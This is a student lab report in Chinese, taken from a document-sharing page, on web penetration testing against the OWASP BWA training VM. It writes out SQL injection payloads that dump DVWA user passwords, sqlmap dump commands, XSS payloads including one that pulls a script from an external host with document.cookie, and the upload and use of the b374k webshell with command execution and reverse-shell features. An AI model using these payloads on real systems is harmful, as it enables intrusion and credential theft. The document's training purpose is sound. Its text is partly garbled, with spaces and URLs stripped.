Web应用程序渗透测试

整理文档很辛苦,赏杯茶钱您下走!

免费阅读已结束,点击下载阅读编辑剩下 ...

阅读已结束,您可以下载文档离线阅读编辑

资源描述

1Web应用程序渗透测试姓名:滕召维学号:13084139一、实验目的1.学习使用OWASPBWA靶机。2.学习使用KaliLinux进行Web应用程序渗透测试。二、实验内容1.使用w3af漏洞扫描器对OWASPBWA靶机进行漏洞扫描。2.根据老师的课堂讲授,按照课件相关内容在OWASPBWA靶机上实践XSS和SQL注入两种攻击。3.配合使用TamperData和sqlmap进行sql注入攻击。4.利用文件上传漏洞植入Webshell。三、主要实验结果(一)使用w3af漏洞扫描器对OWASPBWA靶机进行漏洞扫描1.启动w3af漏洞扫描器。2.编辑新建的Profile,也就是配置各种插件。对audit类插件勾选sqli和xss两个插件,如下图:对crawl类插件只勾选web_spider,如下图2对web_spider的配置在窗口右侧,勾选only_forward并保存,如下图对output类插件,只勾选输出html文件。对输出文件的配置在窗口右侧,如下图输入文件名称并保存。这样扫描结果将保存在/root/dvwa.html文件中。4.如下图在Target一栏输入扫描的网址,单击右侧按钮start启动扫描。扫描过程中3扫描结果4(二)在OWASPBWA靶机上实践XSS和SQL注入两种攻击1.在KaliLinux攻击主机上,按照课件第29页,实践“通过SQL注入攻击绕过身份认证机制”。52.XSS和SQL注入攻击(1)在攻击机上访问,按照1.的攻击方法,登录进入DVWA训练系统。6(2)首先按照图示将DVWA应用的安全等级设置为Low。(3)按照课件29-31页,实践SQL注入攻击。使用OWASPBWA靶机的DVWA应用程序演示如何获取后台数据库更多的信息。输入文件“XSS&SQLi.txt”中的脚本。将数据表中的每一行都显示出来,输入:'or'1=17查询INFORMATION_SCHEMA系统表,输入:'UNIONSELECT1,table_namefromINFORMATION_SCHEMA.tables--'列出user表的内容,输入:'UNIONSELECT1,column_namefromINFORMATION_SCHEMA.columnswheretable_name='users'--'8④取得口令的MD5值,输入:'UNIONSELECTNULL,passwordfromusers--'⑤使用concat()函数将所有的信息都列出来,输入:'UNIONSELECTpassword,concat(first_name,'',last_name,'',user)fromusers--'9(4)按照课件第40页,实践反射式XSS攻击。输入scriptalert('Havefuns')/script输入scriptalert(document.cookie)/script(5)按照课件第43页,访问,登录进入mutilidae训练系统,实践存储式XSS攻击。访问Mutillidae的CrossSiteScripting(XSS)输入:SCRIPT/XSSSRC=的内容如下:document.write(Thisisremotetextviaxss.jslocatedatha.ckers.org+document.cookie);alert(Thisisremotetextviaxss.jslocatedatha.ckers.org+document.cookie);首先按照sql注入攻击登录进入mutilidae训练系统10输入:SCRIPT/XSSSRC=(Thisisremotetextviaxss.jslocatedatha.ckers.org+document.cookie);alert(Thisisremotetextviaxss.jslocatedatha.ckers.org+document.cookie);(三)配合使用TamperData和sqlmap进行sql注入攻击11重复(二)中步骤2-(1)和2-(2)。启动TamperData插件。4.按照课件33页使用Sqlmap进行SQL注入攻击。(1)扫描,输入:sqlmap-u'=aa&Submit=Submit#'--cookie='TamperData插件抓取的内容'12(2)获取数据库名,输入:sqlmap-u'=aa&Submit=Submit#'--cookie='TamperData插件抓取的内容'--dbs-v013(3)获取dvwa数据库中存在的表名,输入:sqlmap-u'=aa&Submit=Submit#'--cookie='TamperData插件抓取的内容'-Ddvwa--tables(4)获取users表中的字段列表,输入:sqlmap-u'=aa&Submit=Submit#'--cookie='TamperData插件抓取的内容'-Ddvwa--tables-Tusers--columns14(5)把Password字段内容搞出来,输入:sqlmap-u'=aa&Submit=Submit#'--cookie='TamperData插件抓取的内容'-Ddvwa--tables-Tusers--columns--dump(6)使用sqlmap获取口令明文,输入:sqlmap-u'=aa&Submit=Submit#'--cookie='TamperData15插件抓取的内容'-Ddvwa--tables-Tusers--columns--dump(四)利用文件上传漏洞植入Webshell1.学习实验课件目录下的有关b374k-shell的html文档。2.首先如(二)-2-(2)将DVWA应用的安全等级设置为Low。3.将实验课件目录下的文件“b374k-2.8.php”上传到web服务器。164.在浏览器中输入网址“”,即可访问webshell,在文本框中输入口令:b374k,单击Go,即可进入界面,如下图所示。5.在Webshell中探索在步骤1中学习的各种功能。Filemanager(view,edit,rename,delete,upload,downloadasarchive,etc)可对文件进行查看、编辑、删除等操作:比如我对dwa_emall.png进行复制操作17Commandexecution命令的执行Scriptexecution(php,perl,python,ruby,java,node.js,c)对脚本的执行:我复制了dwa_emall.png中的内容粘贴到这里,点击go。点击Go时弹出如下提示,说明该脚本正在运行中。提供服务器的信息可以连接到数据库18还有Giveyoushellviabind/reverseshellconnect的功能。

1 / 18
下载文档,编辑使用

©2015-2020 m.777doc.com 三七文档.

备案号:鲁ICP备2024069028号-1 客服联系 QQ:2149211541

×
保存成功